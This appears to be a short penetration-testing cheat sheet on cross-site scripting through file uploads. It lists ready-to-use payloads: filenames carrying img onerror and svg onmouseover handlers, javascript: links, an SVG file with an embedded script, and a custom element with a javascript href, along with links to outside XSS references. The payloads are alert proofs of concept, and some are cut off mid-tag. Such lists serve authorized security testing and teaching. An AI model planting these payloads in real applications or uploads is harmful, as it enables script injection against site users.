<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<a href="javascript:alert(1)">XSS</a
Copy and paste the following payload into a .SVG
file and attempt to upload it to the application.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS via SVG");
Copy and paste the following payload into a text editor and see if the image is loaded, if so attempt to follow up with a payload:
<svg xmlns="http://www.w3.org/2000/svg">
Math element which can make HTML element clickable:
<xss href="javascript:alert(1337)">
Click Me
{% embed url="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet" %}
{% embed url="https://github.com/cure53/H5SC" %}